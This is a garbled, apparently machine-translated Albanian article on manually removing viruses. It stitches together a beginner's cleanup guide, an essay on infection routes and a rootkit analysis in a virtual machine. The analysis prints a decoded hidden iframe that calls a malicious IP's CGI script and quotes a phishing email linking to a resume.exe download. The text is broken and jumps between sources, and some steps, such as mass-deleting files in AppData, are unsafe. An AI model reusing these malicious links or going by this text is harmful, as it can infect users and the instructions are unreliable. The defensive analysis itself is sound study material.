Pra, sot do të flasim me ju se si të hiqni manualisht një virus nga kompjuteri juaj. Përveç kësaj, le të shohim se çfarë Trojans mund të hasen, si manifestohen dhe nga ku mund të futen në kompjuter. Le të fillojmë të studiojmë temën tonë të sotme sa më shpejt të jetë e mundur.
Llojet e viruseve
Epo, por përpara se të hiqni virusin manualisht nga kompjuteri, ia vlen të flasim me ju se çfarë lloj infeksioni gjendet përgjithësisht në kompjuter. Në të vërtetë, në shumicën e rasteve, nga kjo varet se si duhet të kryhet trajtimi. Pra, le të fillojmë.
Virusi i parë është një Trojan. Është një skedar me qëllim të keq që "vendos" në sistemin operativ, madje e dëmton atë. Për shembull, dëmton ose shkatërron dokumente të rëndësishme. Tani ka shumë prej tyre.
Lloji i dytë mjaft i zakonshëm i virusit është një shumëllojshmëri ransomware. Këto janë skedarë që hyjnë në sistem dhe e bllokojnë atë. Por jo duke shkatërruar, por vetëm duke enkriptuar dokumente. Në fund të një kodi të tillë, si rregull, lihet një e-mail i krijuesit, në të cilin duhet të transferohet një shumë e caktuar parash për t'i kthyer dokumentet në formën e tyre origjinale.
Virusi i tretë që mund të kapet është, natyrisht, shtesa të ndryshme të shfletuesit ose spam. Si rregull, ata shumë dhe madje ndërhyjnë në punën në internet. Kjo për faktin se faqja fillestare e përdoruesit mund të ndryshojë, plus, përveç kësaj, banderola reklamuese do të vendosen kudo në shfletues. Kur përdoruesit e shohin këtë foto, ata mendojnë se si të gjejnë viruset në kompjuter me dorë dhe më pas t'i heqin ato. Tani do të përpiqemi ta kuptojmë.
Shenjat e infeksionit
Pra, përpara se të gjejmë viruset me dorë dhe të shpëtojmë prej tyre një herë e mirë, le të përpiqemi të kuptojmë se çfarë mund t'ju tregojë praninë e një infeksioni kompjuterik në sistem. Në fund të fundit, nëse zbuloni sinjale në kohë, mund të shmangni dëmtimin e një numri të madh skedarësh dhe humbjen e "sistemit operativ".
Shenja e parë dhe më e dukshme nuk është gjë tjetër veçse mesazhe nga programi juaj antivirus. Do të "betohet" në disa dokumente dhe skedarë, duke ju dhënë emrin e virusit të supozuar. Vërtetë, ndonjëherë antivirusi sillet në këtë mënyrë në lidhje me çarje të ndryshme dhe "tableta" për lojërat kompjuterike. Sidoqoftë, kjo nuk mund të injorohet.
Skenari i dytë është që kompjuteri juaj fillon të "ngadalësohet". Është atëherë që përdoruesit fillojnë të mendojnë në mënyrë aktive se si ta heqin virusin me dorë, veçanërisht nëse nuk kanë antivirus. Pra, sapo të vini re se sistemi juaj është bërë "ngadalësuar", filloni të bini alarmin.
Një tjetër skenar është që programe të reja filluan të shfaqen në kompjuter që nuk i keni instaluar. Një lëvizje mjaft e zakonshme në mesin e një infeksioni kompjuterik.
Për më tepër, reklamat në shfletues mund të tregojnë se kompjuteri është i infektuar. Ndryshimi i faqes fillestare pa mundësi rikuperimi, banderola reklamuese kudo dhe kudo - të gjitha këto janë sinjale mjaft alarmante. Pra, le të shohim shpejt se si bëhet me dorë nga kompjuteri.
Kërko
Epo, gjëja e parë që duhet të bëni është të filloni duke kërkuar vendet ku fshihet infeksioni. Kjo ndonjëherë është shumë e vështirë për t'u bërë. Sidomos nëse nuk keni një program antivirus. Në përgjithësi, le të shohim se çfarë mund të bëhet në këtë situatë.
Pra, kur të vendosni të luftoni vetë virusin, do t'ju duhet të gjeni dosjen në kompjuterin tuaj ku është ruajtur. Ndonjëherë infeksioni tradhton veten duke krijuar proceset e veta në Open it (Ctrl + Alt + Del), më pas shkoni te skeda "Proceset". Tani gjeni atje ndonjë rresht të dyshimtë (ai do të quhet disi çuditërisht, apo edhe i nënshkruar me hieroglife) dhe klikoni në butonin "shfaq vendndodhjen e skedarit". U krye, virusi u gjet.
Vërtetë, jo gjithçka është gjithmonë kaq e lehtë dhe e thjeshtë. Nëse po mendoni se si të hiqni manualisht një virus nga kompjuteri juaj, atëherë duhet të dini se infeksioni i kompjuterit shpesh fshihet mirë. Në shfaqjen e dosjeve, kontrolloni kutinë "ekrani dhe dosjet". Kërkimi tani do të jetë shumë më i lehtë.
Mos harroni gjithashtu se shumë shpesh ata "vendosen" në dosjen e Windows. Për shembull, shumica e trojanëve gjenden në System32. Disa infeksione mund të "regjistrohen" në skedarin pritës. Ne i dimë vendet e preferuara të viruseve. Por si të shpëtoni prej tyre?
Çeqe
Skenari i parë është heqja e infeksionit automatikisht. Më saktësisht, në mënyrë gjysmë automatike. Bëhet fjalë për kontrollimin e viruseve duke përdorur një program antivirus.
Për të siguruar mbrojtje të besueshme të të dhënave, rezervoni një antivirus të mirë. Dr.Web është i mrekullueshëm. Nëse nuk ju pëlqen, mund të provoni edhe Nod32. Edhe ai po e bën shumë mirë detyrën.
Bëni një kontroll të thellë. Pasi programi t'ju japë rezultatet, përpiquni të kuroni automatikisht dokumentet. Nuk funksionoi? Pastaj fshijini ato. Sidoqoftë, nëse po mendoni se si të hiqni manualisht një virus nga kompjuteri juaj, atëherë ka shumë të ngjarë që kontrollet antivirus nuk ju ndihmuan. Le të shohim se çfarë tjetër mund të bëni.
Ne i fshijmë programet
Hapi i dytë në rrugën drejt shërimit të sistemit është, natyrisht, heqja e përmbajtjeve të ndryshme që ju ka udhëzuar virusi. Kjo është një dukuri mjaft e zakonshme. Pra, hidhini një sy "panelit të kontrollit" dhe prej andej vazhdoni te "shtoni ose hiqni programe". Prisni pak ndërsa kontrolloni përmbajtjen në kompjuterin tuaj.
Kur një listë e programeve shfaqet para jush, fshini gjithçka që nuk përdorni. Kushtojini vëmendje të veçantë përmbajtjes që nuk e keni instaluar. Ose ai që u shfaq si “rimorkio” pasi kishte përfunduar instalimi i ndonjë “programi” tjetër. Klikoni në rreshtin e dëshiruar me butonin e djathtë të miut, më pas zgjidhni komandën "fshij". Gati? Atëherë mund të mendoni se si ta hiqni virusin manualisht nga kompjuteri juaj.
Skanimi total
Tani le të përdorim disa nga shërbimet dhe teknikat që do të na ndihmojnë patjetër. Nëse e dini emrin e virusit (veçanërisht nëse përballeni me spam), atëherë kërkimi i një infeksioni duke përdorur një regjistër kompjuterik është i përshtatshëm për ju.
Për të shkuar te shërbimi i kërkuar, shtypni kombinimin e tasteve Win + R dhe më pas ekzekutoni komandën "regedit". Shikoni se çfarë shfaqet para jush. Në anën e majtë të dritares ka dosje me emra të gjatë dhe të pakuptueshëm. Është në to që viruset shpesh fshihen. Por ne do ta bëjmë detyrën tonë të kërkimit pak më të lehtë. Mjafton të shkoni te "redakto" dhe më pas të klikoni "kërko". Shkruani emrin e virusit dhe më pas kontrolloni atë.
Pas marrjes së rezultateve, të gjitha rreshtat që shfaqen duhet të fshihen. Për ta bërë këtë, klikoni në secilën prej tyre me radhë dhe më pas zgjidhni komandën e kërkuar. Gjithçka është gati? Pastaj rinisni kompjuterin tuaj. Tani ju e dini se si të hiqni një virus manualisht nga kompjuteri juaj.
Në këtë artikull, unë do t'ju tregoj se si pastroni kompjuterin tuaj nga viruset me një garanci 99%, sepse asnjë antivirus modern nuk mund të sigurojë mbrojtje 100%. Nëse nuk doni të lexoni për një kohë të gjatë ose të bëni një gabim, mund të shikoni videon tonë më poshtë.
Aktivizoni desktopin -> shtypni butonin e fillimit -> panelin e kontrollit -> ikona të vogla lart djathtas -> opsionet e dosjeve -> skedën e shikimit -> ulni rrëshqitësin poshtë dhe zgjidhni kutitë: Fshih skedarët e mbrojtur të sistemit, fshih shtesën për të regjistruar llojet e skedarëve dhe vendosni një pikë përballë Trego skedarët dhe dosjet e fshehura -> klikoni aplikoni dhe më pas OK.
Përsëri kompjuteri im -> disku c -> përdoruesit -> dosja me emrin e përdoruesit -> AppData -> Local -> Temp -> zgjidh përsëri të gjithë skedarët dhe fshiji ato -> kthehu te dosja Local dhe hiqe deri në fund dhe fshij te gjitha dokumentet ( mos prekni dosjet, kini kujdes
), përveç atyre me fund DAT, ini.
Shkarkoni malwarebytes anti malware instaloni programin në fund të instalimit, hiqni zgjedhjen e periudhës së provës PRO. Pas nisjes së parë të programit, do t'ju duhet të kryeni përditësimin, prisni derisa të përfundojë përditësimi, në dritaren që hapet, vendosni një pikë pranë mbishkrimit të kontrollit të plotë. Prisni deri në fund të skanimit të kompjuterit tuaj për viruse. Nëse gjenden viruse, atëherë pas skanimit, duhet t'i hiqni ato. Në dritaren e shfaqur me një listë të viruseve, kontrolloni të gjitha kutitë dhe klikoni butonin Hiq kërcënimet. Programi mund të kërkojë rinisjen e kompjuterit për të hequr viruset. Rinisni dhe filloni përsëri skanimin, nëse gjendet përsëri një virus, bëni disa kontrolle të tjera, por jo më shumë se 4. Nëse pas 4 kontrolleve gjenden viruse, atëherë nuk do të jetë e mundur t'i hiqni ato, ato tashmë janë integruar fort në sistemin tuaj, është më e lehtë të riinstaloni Windows. Nëse ende keni arritur të hiqni të gjitha kërcënimet. Për më shumë besim, mund ta kontrolloni kompjuterin tuaj me antivirusin tuaj standard.
Pas përfundimit të të gjithë këtyre hapave, në shumicën e rasteve, kompjuteri juaj do të fillojë të punojë më shpejt, do të pastrohet plotësisht nga viruset. Mundesh akoma Çfarë duhet të bëni nëse antivirusi nuk e ka përballuar punën e tij.
& nbsp & nbsp Ju, me siguri, keni takuar vazhdimisht informacionin në media se është shfaqur një virus i ri i tmerrshëm, i cili mund të çojë në një epidemi të re të tmerrshme dhe pothuajse në fund të internetit. Ose, se është shfaqur një teknologji e re e shkrimit të virusit, e bazuar në përdorimin e pjesëve më pak të rëndësishme të pikselëve të imazheve grafike, dhe trupi i virusit është pothuajse i pamundur të zbulohet. Ose ... shumë gjëra të tjera të shëmtuara. Ndonjëherë viruset janë të pajisura pothuajse me arsye dhe vetëdije. Kjo ndodh sepse shumë përdorues, duke u hutuar në klasifikimin kompleks dhe detajet e mekanizmit të funksionimit të viruseve, harrojnë se, para së gjithash, çdo virus është një program kompjuterik, d.m.th. një grup udhëzimesh (udhëzimesh) të procesorit, të formatuara në një mënyrë të caktuar. Nuk ka rëndësi se në çfarë forme ekziston ky grup (një skedar i ekzekutueshëm, një skrip, një pjesë e sektorit të nisjes ose një grup sektorësh jashtë sistemit të skedarëve) - është shumë më e rëndësishme që ky program të mos fitojë kontroll, d.m.th. filloni të ekzekutoni. Një virus i shkruar në hard diskun tuaj, por që nuk funksionon, është po aq i padëmshëm sa çdo skedar tjetër. Detyra kryesore në luftën kundër viruseve nuk është zbulimi i trupit të virusit, por parandalimi i mundësisë së lëshimit të tij. Prandaj, prodhuesit kompetentë të viruseve po përmirësojnë vazhdimisht jo vetëm teknologjitë për futjen e programeve me qëllim të keq në sistem, por edhe metodat e lëshimit dhe funksionimit të fshehtë.
Si infektohet një kompjuter me softuer me qëllim të keq (virus)? Përgjigja është e qartë - një program duhet të funksionojë. Idealisht - me të drejta administrative, mundësisht - pa dijeninë e përdoruesit dhe të padukshme për të. Metodat e lëshimit po përmirësohen vazhdimisht dhe bazohen jo vetëm në mashtrimin e drejtpërdrejtë, por edhe në veçoritë ose mangësitë e sistemit operativ ose softuerit aplikativ. Për shembull, përdorimi i veçorisë autorun për media të lëvizshme në mjedisin e sistemit operativ Windows ka çuar në përhapjen e viruseve në disqet flash. Funksionet e ekzekutimit automatik zakonisht thirren nga media e lëvizshme ose nga dosjet e rrjetit të përbashkët. Në fillimin automatik, skedari përpunohet Autorun.inf... Ky skedar përcakton se cilat komanda ekzekuton sistemi. Shumë kompani e përdorin këtë funksion për të nisur instaluesit e produkteve të tyre softuerike, megjithatë, prodhuesit e viruseve gjithashtu kanë filluar ta përdorin atë. Si rezultat, ju mund të harroni për autorun si një lehtësi kur punoni në një kompjuter. - shumica e përdoruesve të ditur e kanë çaktivizuar këtë opsion përgjithmonë.
Për të çaktivizuar funksionet autorun në Windows XP / 2000, një skedar reg për importim në regjistër.
Për Windows 7 dhe versionet më të reja, mund të çaktivizoni AutoPlay duke përdorur aplikacionin AutoPlay në Control Panel. Në këtë rast, mbyllja vlen për përdoruesin aktual. Një mënyrë më e besueshme për t'u mbrojtur nga futja e viruseve të bartura në pajisjet e lëvizshme është bllokimi i autorun për të gjithë përdoruesit që përdorin politikat e grupit:
& nbsp & nbsp Por "furnizuesi" kryesor i viruseve është padyshim Interneti dhe, si softueri kryesor aplikativ - "Internet Explorer" (shfletuesi). Faqet e internetit po bëhen gjithnjë e më komplekse dhe më të bukura, mundësitë e reja multimediale po shfaqen, rrjetet sociale po rriten, numri i serverëve po rritet vazhdimisht dhe numri i vizitorëve të tyre po rritet. Shfletuesi i internetit gradualisht po kthehet në një paketë komplekse softuerike - një përkthyes i të dhënave të marra nga jashtë. Me fjalë të tjera, në një paketë softuerike që ekzekuton programe të bazuara në përmbajtje të panjohur. Zhvilluesit e shfletuesve (shfletuesve) po punojnë vazhdimisht për të përmirësuar sigurinë e produkteve të tyre, por edhe prodhuesit e viruseve po ecin përpara, dhe gjasat e infektimit me malware të sistemit mbeten mjaft të larta. Ekziston një mendim se nëse nuk vizitoni "faqet për të rritur", faqet me numra serialë të produkteve softuerike, etj. atëherë mund të shmanget infeksioni. Kjo nuk është plotësisht e vërtetë. Ka shumë faqe të hakuara në internet, pronarët e të cilave as nuk janë në dijeni të hakimit. Dhe kohët kur krisurat kënaqnin kotësinë e tyre duke zëvendësuar faqet (deface) kanë ikur prej kohësh. Në ditët e sotme, një hak i tillë zakonisht shoqërohet me futjen në faqet e një faqeje krejtësisht të respektuar, një kod të veçantë për të infektuar kompjuterin e vizitorit. Përveç kësaj, prodhuesit e viruseve përdorin termat më të njohura të kërkimit për të shfaqur faqet e infektuara në rezultatet e motorit të kërkimit. Pyetjet me frazat "shkarkim falas" dhe "shkarkim pa regjistrim dhe SMS" janë veçanërisht të njohura. Mundohuni të mos përdorni këto fjalë në pyetjet e kërkimit, përndryshe rreziku për të marrë një lidhje me faqet me qëllim të keq rritet ndjeshëm. Sidomos nëse jeni duke kërkuar për një film të njohur që ende nuk është lansuar ose koncertin e fundit të një grupi të famshëm.
& nbsp & nbsp Do të përpiqem të shpjegoj me një shembull mekanizmin e infektimit të kompjuterit të vizitorëve të faqes, në një formë të thjeshtuar. Jo shumë kohë më parë, kur vizitova një sit mjaft të njohur, mora një njoftim nga PT Startup Monitor se aplikacioni rsvc.exe përpiqet të shkruajë në regjistër. Aplikacioni u mbyll me sukses nga FAR dhe ndryshimet në regjistër u anuluan nga PT Startup Monitor. Analiza e faqeve të faqes tregoi praninë e një kodi të çuditshëm në gjuhën Javascript që kryen operacione për të transformuar të dhënat e vargut që nuk janë tekst kuptimplotë. Javascript mbështetet nga shumica e shfletuesve modernë dhe përdoret pothuajse në të gjitha faqet e internetit. Skripti i shkarkuar nga faqe të tilla ekzekutohet nga shfletuesi i Internetit. Si rezultat i transformimeve të shumta të vargjeve të përmendura më lart, u mor një kod mjaft i thjeshtë:
iframe src = "http://91.142.64.91/ts/in.cgi?rut4" gjerësi = 1 lartësi = 1 stil = "dukshmëri: e fshehur"
Do të thotë ekzekutimi i skriptit CGI të serverit me adresën IP 91.142.64.91 (që nuk ka të bëjë fare me sitin e vizituar) në një dritare të veçantë (etiketë iframe) që mat 1 piksel në gjerësi dhe 1 piksel në lartësi, në një të padukshme dritare. Rezultati është një infeksion viral shumë i mundshëm. Sidomos nëse nuk ka antivirus ose nuk do të reagojë ndaj kërcënimit. Ky shembull i ridrejtimit të fshehur të një vizitori në një faqe me qëllim të keq duke përdorur etiketën "iframe" ndoshta nuk është shumë i rëndësishëm sot, por tregon mjaft se si, gjatë vizitës së një faqeje ligjore, mund të vizitoni në mënyrë të padukshme një tjetër, jo shumë të ligjshëm, pa e ditur as vetë. atë. Fatkeqësisht, nuk ka asnjë garanci absolute kundër infeksionit viral dhe duhet të jeni të përgatitur për faktin se do të duhet të përballeni vetë me virusin.
& nbsp & nbsp Kohët e fundit, një nga drejtimet kryesore të zhvillimit të programeve me qëllim të keq është bërë përdorimi i të gjitha llojeve të metodave të mbrojtjes kundër zbulimit nga mjetet antivirus - të ashtuquajturat rootkit - teknologji. Programe të tilla shpesh ose nuk zbulohen nga antiviruset ose nuk hiqen prej tyre. Në këtë artikull do të përpiqem të përshkruaj një teknikë pak a shumë universale për zbulimin dhe heqjen e programeve me qëllim të keq nga një sistem i infektuar.
& nbsp & nbsp Heqja e një virusi "me cilësi të lartë" po bëhet një detyrë gjithnjë e më e parëndësishme, pasi zhvilluesit ofrojnë një virus të tillë me veti që e bëjnë sa më të vështirë zgjidhjen e tij. Shpesh, një virus mund të funksionojë në modalitetin kernel dhe ka aftësi të pakufizuara për të kapur dhe modifikuar funksionet e sistemit. Me fjalë të tjera, virusi ka aftësinë të fshehë skedarët e tij, çelësat e regjistrit, lidhjet e rrjetit nga përdoruesi (dhe antivirusi) - gjithçka që mund të jetë një shenjë e pranisë së tij në sistemin e infektuar. Mund të anashkalojë çdo mur zjarri, sisteme të zbulimit të ndërhyrjeve dhe analizues të protokollit. Dhe mbi të gjitha, mund të funksionojë edhe në modalitetin e nisjes së sigurt të Windows. Me fjalë të tjera, malware modern është shumë i vështirë për t'u zbuluar dhe neutralizuar.
& nbsp & nbsp Zhvillimi i antiviruseve gjithashtu nuk qëndron ende - ato janë duke u përmirësuar vazhdimisht, dhe në shumicën e rasteve, ata do të jenë në gjendje të zbulojnë dhe neutralizojnë malware, por herët a vonë, do të ketë një modifikim të virusit që do të të jetë shumë i ashpër për çdo antivirus për disa kohë. Prandaj, vetë-zbulimi dhe heqja e një virusi është një punë që herët a vonë do të duhet të kryhet nga çdo përdorues kompjuteri.
Përshëndetje.
Ne jemi të interesuar për kandidaturën tuaj, por ju sugjerojmë të plotësoni
rezymenë tonë të letrës dhe dërgojeni tek [email i mbrojtur]
Përgjigja nuk është e garantuar, por nëse CV-ja juaj na intereson, ne
do t'ju telefonojmë brenda pak ditësh. Mos harro
tregoni numrin e telefonit, si dhe pozicionin për të cilin po aplikoni. E dëshirueshme
tregoni gjithashtu dëshirat për pagë.
Ju mund ta shkarkoni letrën tonë nga lidhja e mëposhtme.
http://verano-konwektor.pl/resume.exe
& nbsp & nbsp Analiza e titujve të postës elektronike tregoi se ishte dërguar nga një kompjuter në Brazil përmes një serveri në Shtetet e Bashkuara. Dhe letra me letra propozohet të shkarkohet nga një server në Poloni. Dhe kjo është me përmbajtje në gjuhën ruse.
& nbsp & nbsp Është e qartë se nuk do të shihni asnjë shkronjë, dhe me shumë mundësi do të merrni një program trojan në kompjuterin tuaj.
& nbsp & nbsp Shkarko skedarin resume.exe. Madhësia është 159744 bajt. Nuk e nis akoma.
& nbsp & nbsp Unë e kopjoj skedarin në kompjuterë të tjerë ku janë instaluar antiviruse të ndryshëm - vetëm për një kontroll tjetër të efektivitetit të tyre. Rezultatet nuk janë aq të nxehta - antivirusi Avast 4.8 Home Edition heshti me delikatesë. Symantec rrëshqiti atë "y - i njëjti reagim. Punoi vetëm AVG 7.5 Free Edition. Duket se ky antivirus, në fakt, po fiton popullaritet për një arsye.
& nbsp & nbsp Të gjitha eksperimentet kryhen në një makinë virtuale me sistemin operativ Windows XP. Një llogari me të drejta administratori, sepse, më shpesh, viruset futen me sukses në sistem vetëm nëse përdoruesi është një administrator lokal.
& nbsp & nbsp Vrapimi. Pas ca kohësh, skedari i infektuar u zhduk, duket sikur virusi filloi veprën e tij të pistë.
& nbsp & nbsp Sjellja e sistemit nuk ka ndryshuar nga jashtë. Është e qartë se nevojitet një rindezje. Për çdo rast, unë ndaloj lidhjet TCP në murin e zjarrit. I lë të lejuara vetëm lidhjet dalëse UDP: 53 (DNS) - duhet t'i lini virusit të paktën një mundësi për të treguar aktivitetin e tij. Si rregull, pasi të futet, virusi duhet të kontaktojë hostin ose një server të caktuar në internet, i cili do të tregohet nga pyetjet DNS. Megjithëse, përsëri, në dritën e sa më sipër, një virus i zgjuar mund t'i maskojë ato, ai gjithashtu mund të anashkalojë një mur zjarri. Duke parë përpara, do të them se në këtë rast të veçantë kjo nuk ndodhi, por për një analizë të besueshme të aktivitetit të rrjetit, është më mirë të dërgoni të gjithë trafikun e një makinerie të infektuar përmes një tjetre, të pa infektuar, ku mund të jeni të sigurt se Rregullat e murit të zjarrit po ndiqen dhe analizuesi i trafikut (kam përdorur Wireshark ) tregon se çfarë është në të vërtetë.
& nbsp & nbsp Rindizni. Nga pamja e jashtme, asgjë nuk ka ndryshuar, përveç faktit që është e pamundur të hysh në internet, pasi unë vetë e çaktivizova këtë mundësi. Asgjë e re nuk është shfaqur në shtigjet e nisjes automatike, në shërbimet ose në katalogët e sistemit. Shikimi i regjistrit të sistemit jep vetëm një këshillë - sistemi nuk ishte në gjendje të fillonte shërbimin misterioz madhështore48... Nuk mund të kisha një shërbim të tillë dhe me kalimin e kohës kjo ngjarje përkoi me momentin e zbatimit. Çfarë tjetër do të sugjeronte një zbatim të suksesshëm është mungesa e një hyrjeje në regjistër për shërbimin grande48 dhe mungesa e një mesazhi të dytë në regjistrin e sistemit që shërbimi nuk filloi të fillonte pas rindezjes. Kjo ka shumë të ngjarë të jetë një e metë e shkrimtarëve të viruseve. Edhe pse është i parëndësishëm, sepse shumica e përdoruesve nuk e shikojnë regjistrin e ngjarjeve dhe në momentin e dyshimit për infeksion, kjo hyrje në regjistër mund të mungojë tashmë.
Ne përcaktojmë praninë e një virusi në sistem.
1. & nbsp & nbsp Sigurisht që duhet të ketë trafik "të majtë". Mund të përcaktohet duke përdorur analizues të protokollit. Unë kam përdorur Wireshark. Menjëherë pas ngarkimit, e lëshoj së pari. Gjithçka është e saktë, ekziston një grup pyetjesh DNS (siç doli - një herë në 5 minuta) për të përcaktuar adresat IP të nyjeve ysiqiyp.com, irgfqfyu.com, updpqpqr.com, etj. Në fakt, të gjitha sistemet operative Windows pëlqejnë të shkojnë në internet kur është e nevojshme dhe jo e nevojshme, antiviruset mund të përditësojnë bazat e të dhënave të tyre, kështu që është mjaft e vështirë të përcaktohet nëse trafiku i përket një virusi. Zakonisht kërkohet të kalohet trafiku përmes një makinerie të pa infektuar dhe të analizohet seriozisht përmbajtja e saj. Por kjo është një temë më vete. Në parim, një shenjë indirekte e anomalive në aktivitetin e rrjetit të sistemit mund të jenë vlera të rëndësishme të sporteleve të trafikut të ofruesit, gjatë kohës së ndërprerjes së sistemit, numëruesve nga vetitë e lidhjes VPN, etj.
2. & nbsp & nbsp Le të përpiqemi të përdorim programe për të kërkuar rootkits. Tani ka shumë programe të tilla dhe ato janë të lehta për t'u gjetur në rrjet. Një nga më të njohurit është Mark Russinovich, i cili mund të shkarkohet nga seksioni Windows Sysinternals i faqes së internetit të Microsoft. Nuk kërkohet instalim. Shkëputeni dhe ekzekutoni. Klikoni "Skano". Pas një skanimi të shkurtër, ne shohim rezultatet:
& nbsp & nbsp Nga rruga, pa u thelluar as në përmbajtjen e rreshtave, mund të vëreni menjëherë se ka regjistrime ose skedarë që janë shumë "të freskët" në kohën e krijimit / modifikimit (kolona "Vula kohore")... Para së gjithash, ne duhet të jemi të interesuar për skedarët me përshkrim (kolona "Përshkrim") - "Fshehur nga Windows API"- I fshehur nga API i Windows. Fshehja e skedarëve, shënimeve në regjistër, aplikacioneve, natyrisht, nuk është normale. Dy skedarë - grande48.sys
dhe Yoy46.sys
- kjo është pikërisht ajo që ne po kërkojmë. Ky është rootkit-i i kërkuar ose një pjesë e tij e regjistruar nën maskën e shoferëve, e cila ofron vjedhje. Prania e të tjerëve në listë ishte një surprizë për mua. Testi tregoi se këta janë drejtues normalë të Windows XP. Përveç kësaj, virusi fshehu praninë e tyre vetëm në dosje \ sistemi32
, dhe kopjet e tyre në \ system32 \ dllcache
mbeti e dukshme.
& nbsp & nbsp Më lejoni t'ju kujtoj se Windows XP përdor një mekanizëm të veçantë për të mbrojtur skedarët e sistemit, i quajtur Mbrojtja e skedarëve të Windows (WFP)... Qëllimi i WFP është të rivendosë automatikisht skedarët e rëndësishëm të sistemit kur ato fshihen ose zëvendësohen me kopje të vjetruara ose të panënshkruara. Të gjithë skedarët e sistemit Windows XP nënshkruhen në mënyrë dixhitale dhe renditen në një bazë të dhënash të veçantë të përdorur nga WFP. Dosja përdoret për të ruajtur kopjet e skedarëve. \ system32 \ dllcache
dhe pjesërisht, \ Windows \ memoria e shoferit
... Kur fshini ose zëvendësoni një nga skedarët e sistemit, WFP kopjon automatikisht kopjen "korrekte" të tij nga dosja \ dllcache. Nëse skedari i specifikuar nuk është në dosjen \ dllcache, Windows XP ju kërkon të futni CD-në e instalimit të Windows XP në diskun tuaj CD-ROM. Provoni të fshini vga.sys nga \ system32 dhe sistemi do ta rikthejë menjëherë duke përdorur kopjen nga dllcache. Dhe situata kur, kur sistemi i rikuperimit të skedarëve po funksionon, skedari i shoferit është në \ dllcache dhe nuk është i dukshëm në \ system32 - kjo është gjithashtu një shenjë shtesë e pranisë së një rootkit në sistem.
Ne heqim virusin nga sistemi.
& nbsp & nbsp Mbetet për të kryer veprimin më të rëndësishëm - për të hequr virusin. Mënyra më e lehtë dhe më e besueshme është të nisësh në një sistem tjetër operativ të pa infektuar dhe të parandalosh nisjen e drejtuesve të rootkit.
Le të përdorim panelin standard të rimëkëmbjes së Windows. Merrni diskun e instalimit të Windows XP dhe niseni prej tij. Në ekranin e parë, zgjidhni artikullin e dytë të menysë - shtypni R.
Ne zgjedhim një sistem (nëse ka disa prej tyre):
Futni fjalëkalimin e administratorit.
Një listë e drejtuesve dhe shërbimeve mund të shihet duke përdorur komandën listsvc:
Në të vërtetë, lista përmban Viti 46 , edhe pse grande48 mungon, që do të thotë se skedari i shoferit grande48.sys është i fshehur në sistem, por nuk ngarkon:
Recovery Console ju lejon të parandaloni ose lejoni fillimin e drejtuesve dhe shërbimeve duke përdorur komandat çaktivizoni dhe mundësojnë... Ne ndalojmë fillimin e Yoy46 me komandën:
& nbsp & nbsp Ne lëshojmë komandën EXIT dhe sistemi shkon në rindezje.
Pas një rindezjeje, drejtuesi i rootkit nuk do të ngarkohet, gjë që do ta bëjë të lehtë fshirjen e skedarëve të tij dhe pastrimin e regjistrit nga shënimet e tij. Ju mund ta bëni atë me dorë, ose mund të përdorni një lloj antivirus. Më efektive, për mendimin tim, do të jetë një skaner falas i bazuar në antivirusin e mirënjohur Dr.Web Igor Danilov. Mund ta shkarkoni nga këtu - http://freedrweb.ru
& nbsp & nbsp Aty mund të shkarkoni gjithashtu "Dr.Web LiveCD" - një imazh disku që ju lejon të rivendosni funksionimin e sistemit të prekur nga viruset në stacionet e punës dhe serverët me Windows \ Unix, të kopjoni informacione të rëndësishme në media të lëvizshme ose një kompjuter tjetër , nëse veprimet e programeve me qëllim të keq e bënë të pamundur nisjen e kompjuterit. Dr.Web LiveCD jo vetëm që do të ndihmojë në pastrimin e kompjuterit tuaj nga skedarët e infektuar dhe të dyshimtë, por gjithashtu do të përpiqet të kurojë objekte të infektuara. Për të hequr virusin, duhet të shkarkoni imazhin (skedarin me shtesën .iso) nga faqja e internetit DrWeb dhe ta shkruani në një CD. Do të krijohet një disk bootable, nga i cili do të niset, i udhëhequr nga një menu e thjeshtë dhe intuitive.
& nbsp & nbsp Nëse, për ndonjë arsye, nuk është e mundur të përdorni Dr.Web LiveCD, mund të provoni skanerin antivirus Dr.Web CureIt!, i cili mund të lansohet duke u nisur në një OS tjetër, për shembull, duke përdorur Winternals Komandant ERD. Për të skanuar një sistem të infektuar, është e nevojshme të specifikoni hard diskun e tij (modaliteti "Skanimi i personalizuar"). Skaneri do t'ju ndihmojë të gjeni skedarët e virusit dhe gjithçka që duhet të bëni është të fshini shënimet që lidhen me të nga regjistri.
& nbsp & nbsp Meqenëse viruset kanë mësuar të regjistrohen për të ekzekutuar në modalitetin e sigurt të nisjes, nuk është e dëmshme të kontrolloni degën e regjistrit:
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ SafeBoot
Seksionet:
Minimale- një listë e drejtuesve dhe shërbimeve të ekzekutuara në Safe Mode
Rrjeti- e njëjta gjë, por me mbështetjen e rrjetit.
Më lejoni të shtoj se ekziston një klasë e re rootkit e përfaqësuar nga BackDoor.MaosBoot, e cila u shfaq në fund të vitit 2007. Ky program trojan shkruan vetë në sektorin e nisjes së hard diskut dhe siguron instalimin e fshehur të drejtuesit të tij në memorie. Vetë drejtuesi i Rootkit shkruhet drejtpërdrejt në sektorët e fundit të diskut fizik, duke anashkaluar sistemin e skedarëve, i cili fsheh praninë e tij në disk. Në përgjithësi, parimi nuk është i ri, dhjetë vjet më parë, malware u maskua në këtë mënyrë në gjurmët rezervë të disqeve dhe disqeve të ngurtë, por doli të ishte shumë efektiv, pasi shumica e antivirusëve ende nuk mund të përballojnë detyrën e heqjes BackDoor.MaosBoot. Sektori i nisjes i përmendur më sipër nuk kontrollon, dhe sektorët në fund të diskut për të nuk kanë të bëjnë fare me sistemin e skedarëve dhe, natyrisht, nuk do të zbulojë një rootkit të tillë. Vërtetë, Dr.Web (dhe, rrjedhimisht, Cureit) përballet mirë me BackDoor.MaosBoot.
& nbsp & nbsp Nëse keni ndonjë dyshim në lidhje me një skedar, mund të përdorni shërbimin antivirus falas në internet virustotal.com. Përdorni një formular të veçantë në faqen kryesore të faqes për të ngarkuar një skedar të dyshimtë dhe për të pritur rezultatet. Virustotal përdor versionet e konsolës së shumë antiviruseve për të skanuar skedarin tuaj të dyshuar. Rezultatet shfaqen në ekran. Nëse skedari është me qëllim të keq, atëherë me një shkallë të lartë probabiliteti, do të jeni në gjendje ta përcaktoni atë. Në një farë mase, shërbimi mund të përdoret për të zgjedhur "antivirusin më të mirë".
një lidhje me një nga temat e forumit virusinfo.info, ku përdoruesit postojnë lidhje me burime të ndryshme kushtuar mbrojtjes antivirus, përfshirë. dhe në internet - kontrollon kompjuterin tuaj, shfletuesin, skedarët ...
